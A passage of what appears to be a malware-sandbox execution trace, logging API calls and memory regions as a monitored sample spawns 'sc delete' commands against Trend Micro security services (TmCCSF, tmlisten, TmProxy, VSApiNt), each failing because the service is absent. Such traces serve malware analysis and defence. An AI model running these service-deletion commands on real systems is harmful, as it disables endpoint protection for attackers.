HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.818] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.818] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.818] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.818] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.818] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.818] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.818] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.818] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.818] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.818] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.818] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.818] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.818] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.818] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.818] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.818] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.818] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.818] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.818] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.818] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.819] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.819] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.819] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.819] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.819] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.819] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.820] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x50ec978bc0 [0078.824] OpenServiceW (hSCManager=0x50ec978bc0, lpServiceName="VSApiNt", dwDesiredAccess=0x10000) returned 0x0 [0078.825] GetLastError () returned 0x424 [0078.825] _ultow (in: _Dest=0x424, _Radix=-326895032 | out: _Dest=0x424) returned="1060" [0078.825] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.826] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x50ec83fa00, nSize=0x2, Arguments=0x50ec83fa30 | out: lpBuffer="鎰P") returned 0x62 [0078.826] GetFileType (hFile=0x24) returned 0x2 [0078.826] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x50ec83f9b0 | out: lpMode=0x50ec83f9b0) returned 1 [0078.957] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x50ec9793b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x50ec83f9a8, lpReserved=0x0 | out: lpBuffer=0x50ec9793b0*, lpNumberOfCharsWritten=0x50ec83f9a8*=0x62) returned 1 [0078.957] LocalFree (hMem=0x50ec9793b0) returned 0x0 [0078.957] LocalFree (hMem=0x0) returned 0x0 [0078.957] CloseServiceHandle (hSCObject=0x50ec978bc0) returned 1 [0078.957] LocalFree (hMem=0x0) returned 0x0 [0078.957] exit (_Code=1060) Thread: id = 344 os_tid = 0x1318 Process: id = "73" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf0eb000" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"TmCCSF\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1452 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1453 start_va = 0xd3a9180000 end_va = 0xd3a919ffff entry_point = 0x0 region_type = private name = "private_0x000000d3a9180000" filename = "" Region: id = 1454 start_va = 0xd3a91a0000 end_va = 0xd3a91b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3a91a0000" filename = "" Region: id = 1455 start_va = 0xd3a91c0000 end_va = 0xd3a923ffff entry_point = 0x0 region_type = private name = "private_0x000000d3a91c0000" filename = "" Region: id = 1456 start_va = 0xd3a9240000 end_va = 0xd3a9243fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3a9240000" filename = "" Region: id = 1457 start_va = 0xd3a9250000 end_va = 0xd3a9250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3a9250000" filename = "" Region: id = 1458 start_va = 0xd3a9260000 end_va = 0xd3a9261fff entry_point = 0x0 region_type = private name = "private_0x000000d3a9260000" filename = "" Region: id = 1459 start_va = 0x7df5ff860000 end_va = 0x7ff5ff85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff860000" filename = "" Region: id = 1460 start_va = 0x7ff679fe0000 end_va = 0x7ff67a002fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679fe0000" filename = "" Region: id = 1461 start_va = 0x7ff67a006000 end_va = 0x7ff67a006fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a006000" filename = "" Region: id = 1462 start_va = 0x7ff67a00e000 end_va = 0x7ff67a00ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a00e000" filename = "" Region: id = 1463 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1464 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1744 start_va = 0xd3a9370000 end_va = 0xd3a946ffff entry_point = 0x0 region_type = private name = "private_0x000000d3a9370000" filename = "" Region: id = 1745 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1746 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5549 start_va = 0xd3a9180000 end_va = 0xd3a918ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3a9180000" filename = "" Region: id = 5550 start_va = 0xd3a9190000 end_va = 0xd3a9196fff entry_point = 0x0 region_type = private name = "private_0x000000d3a9190000" filename = "" Region: id = 5551 start_va = 0xd3a9270000 end_va = 0xd3a932dfff entry_point = 0xd3a9270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5552 start_va = 0xd3a9470000 end_va = 0xd3a94effff entry_point = 0x0 region_type = private name = "private_0x000000d3a9470000" filename = "" Region: id = 5553 start_va = 0xd3a95d0000 end_va = 0xd3a95dffff entry_point = 0x0 region_type = private name = "private_0x000000d3a95d0000" filename = "" Region: id = 5554 start_va = 0x7ff679ee0000 end_va = 0x7ff679fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679ee0000" filename = "" Region: id = 5555 start_va = 0x7ff67a00c000 end_va = 0x7ff67a00dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a00c000" filename = "" Region: id = 5556 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5557 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5571 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5572 start_va = 0xd3a9330000 end_va = 0xd3a9336fff entry_point = 0x0 region_type = private name = "private_0x000000d3a9330000" filename = "" Region: id = 5573 start_va = 0xd3a94f0000 end_va = 0xd3a95cefff entry_point = 0xd3a94f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5574 start_va = 0xd3a9340000 end_va = 0xd3a9351fff entry_point = 0xd3a9340000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 101 os_tid = 0xe20 [0079.864] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.864] __set_app_type (_Type=0x1) [0079.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.864] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.864] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.926] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.926] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.927] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.927] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.927] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.927] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.927] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.927] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.927] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.927] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.927] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.927] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.927] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.927] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.927] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.927] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.927] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.927] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.927] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.927] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.927] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.927] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.928] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xd3a9378cb0 [0079.933] OpenServiceW (hSCManager=0xd3a9378cb0, lpServiceName="TmCCSF", dwDesiredAccess=0x10000) returned 0x0 [0079.933] GetLastError () returned 0x424 [0079.933] _ultow (in: _Dest=0x424, _Radix=-1457259656 | out: _Dest=0x424) returned="1060" [0079.933] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.935] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xd3a923fb30, nSize=0x2, Arguments=0xd3a923fb60 | out: lpBuffer="鎰ꤷÓ") returned 0x62 [0079.935] GetFileType (hFile=0x24) returned 0x2 [0079.935] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xd3a923fae0 | out: lpMode=0xd3a923fae0) returned 1 [0079.945] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xd3a93793b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xd3a923fad8, lpReserved=0x0 | out: lpBuffer=0xd3a93793b0*, lpNumberOfCharsWritten=0xd3a923fad8*=0x62) returned 1 [0079.945] LocalFree (hMem=0xd3a93793b0) returned 0x0 [0079.945] LocalFree (hMem=0x0) returned 0x0 [0079.945] CloseServiceHandle (hSCObject=0xd3a9378cb0) returned 1 [0079.945] LocalFree (hMem=0x0) returned 0x0 [0079.945] exit (_Code=1060) Thread: id = 357 os_tid = 0x1364 Process: id = "74" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf170000" os_pid = "0xe24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"tmlisten\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1465 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1466 start_va = 0xd3b7a30000 end_va = 0xd3b7a4ffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7a30000" filename = "" Region: id = 1467 start_va = 0xd3b7a50000 end_va = 0xd3b7a63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b7a50000" filename = "" Region: id = 1468 start_va = 0xd3b7a70000 end_va = 0xd3b7aeffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7a70000" filename = "" Region: id = 1469 start_va = 0xd3b7af0000 end_va = 0xd3b7af3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b7af0000" filename = "" Region: id = 1470 start_va = 0xd3b7b00000 end_va = 0xd3b7b00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b7b00000" filename = "" Region: id = 1471 start_va = 0xd3b7b10000 end_va = 0xd3b7b11fff entry_point = 0x0 region_type = private name = "private_0x000000d3b7b10000" filename = "" Region: id = 1472 start_va = 0x7df5ffb60000 end_va = 0x7ff5ffb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb60000" filename = "" Region: id = 1473 start_va = 0x7ff67a880000 end_va = 0x7ff67a8a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a880000" filename = "" Region: id = 1474 start_va = 0x7ff67a8a7000 end_va = 0x7ff67a8a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a8a7000" filename = "" Region: id = 1475 start_va = 0x7ff67a8ae000 end_va = 0x7ff67a8affff entry_point = 0x0 region_type = private name = "private_0x00007ff67a8ae000" filename = "" Region: id = 1476 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1477 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1747 start_va = 0xd3b7c60000 end_va = 0xd3b7d5ffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7c60000" filename = "" Region: id = 1748 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1749 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5588 start_va = 0xd3b7a30000 end_va = 0xd3b7a3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b7a30000" filename = "" Region: id = 5589 start_va = 0xd3b7a40000 end_va = 0xd3b7a46fff entry_point = 0x0 region_type = private name = "private_0x000000d3b7a40000" filename = "" Region: id = 5590 start_va = 0xd3b7b20000 end_va = 0xd3b7bddfff entry_point = 0xd3b7b20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5591 start_va = 0xd3b7be0000 end_va = 0xd3b7c5ffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7be0000" filename = "" Region: id = 5592 start_va = 0xd3b7ee0000 end_va = 0xd3b7eeffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7ee0000" filename = "" Region: id = 5593 start_va = 0x7ff67a780000 end_va = 0x7ff67a87ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a780000" filename = "" Region: id = 5594 start_va = 0x7ff67a8ac000 end_va = 0x7ff67a8adfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a8ac000" filename = "" Region: id = 5595 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5596 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5602 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5603 start_va = 0xd3b7d60000 end_va = 0xd3b7d66fff entry_point = 0x0 region_type = private name = "private_0x000000d3b7d60000" filename = "" Region: id = 5604 start_va = 0xd3b7d70000 end_va = 0xd3b7e4efff entry_point = 0xd3b7d70000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5605 start_va = 0xd3b7e50000 end_va = 0xd3b7e61fff entry_point = 0xd3b7e50000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 102 os_tid = 0xe28 [0080.031] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0080.031] __set_app_type (_Type=0x1) [0080.031] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0080.031] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0080.031] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.139] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.139] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0080.139] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0080.139] _wcsicmp (_String1="delete", _String2="query") returned -13 [0080.139] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0080.139] _wcsicmp (_String1="delete", _String2="start") returned -15 [0080.139] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0080.139] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0080.139] _wcsicmp (_String1="delete", _String2="control") returned 1 [0080.139] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0080.139] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0080.139] _wcsicmp (_String1="delete", _String2="config") returned 1 [0080.140] _wcsicmp (_String1="delete", _String2="description") returned -7 [0080.140] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0080.140] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0080.140] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0080.140] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0080.140] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0080.140] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0080.140] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0080.140] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0080.140] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0080.140] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0080.140] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0080.140] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0080.142] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xd3b7c68ce0 [0080.148] OpenServiceW (hSCManager=0xd3b7c68ce0, lpServiceName="tmlisten", dwDesiredAccess=0x10000) returned 0x0 [0080.148] GetLastError () returned 0x424 [0080.148] _ultow (in: _Dest=0x424, _Radix=-1213268648 | out: _Dest=0x424) returned="1060" [0080.148] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.150] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xd3b7aefd10, nSize=0x2, Arguments=0xd3b7aefd40 | out: lpBuffer="鎰럆Ó") returned 0x62 [0080.151] GetFileType (hFile=0x24) returned 0x2 [0080.151] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xd3b7aefcc0 | out: lpMode=0xd3b7aefcc0) returned 1 [0080.173] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xd3b7c693b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xd3b7aefcb8, lpReserved=0x0 | out: lpBuffer=0xd3b7c693b0*, lpNumberOfCharsWritten=0xd3b7aefcb8*=0x62) returned 1 [0080.174] LocalFree (hMem=0xd3b7c693b0) returned 0x0 [0080.174] LocalFree (hMem=0x0) returned 0x0 [0080.174] CloseServiceHandle (hSCObject=0xd3b7c68ce0) returned 1 [0080.174] LocalFree (hMem=0x0) returned 0x0 [0080.174] exit (_Code=1060) Thread: id = 360 os_tid = 0x1370 Process: id = "75" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf0f5000" os_pid = "0xe2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"TmProxy\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1478 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1479 start_va = 0x95dacf0000 end_va = 0x95dad0ffff entry_point = 0x0 region_type = private name = "private_0x00000095dacf0000" filename = "" Region: id = 1480 start_va = 0x95dad10000 end_va = 0x95dad23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000095dad10000" filename = "" Region: id = 1481 start_va = 0x95dad30000 end_va = 0x95dadaffff entry_point = 0x0 region_type = private name = "private_0x00000095dad30000" filename = "" Region: id = 1482 start_va = 0x95dadb0000 end_va = 0x95dadb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000095dadb0000" filename = "" Region: id = 1483 start_va = 0x95dadc0000 end_va = 0x95dadc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000095dadc0000" filename = "" Region: id = 1484 start_va = 0x95dadd0000 end_va = 0x95dadd1fff entry_point = 0x0 region_type = private name = "private_0x00000095dadd0000" filename = "" Region: id = 1485 start_va = 0x7df5ffcd0000 end_va = 0x7ff5ffccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffcd0000" filename = "" Region: id = 1486 start_va = 0x7ff67a710000 end_va = 0x7ff67a732fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a710000" filename = "" Region: id = 1487 start_va = 0x7ff67a733000 end_va = 0x7ff67a733fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a733000" filename = "" Region: id = 1488 start_va = 0x7ff67a73e000 end_va = 0x7ff67a73ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a73e000" filename = "" Region: id = 1489 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 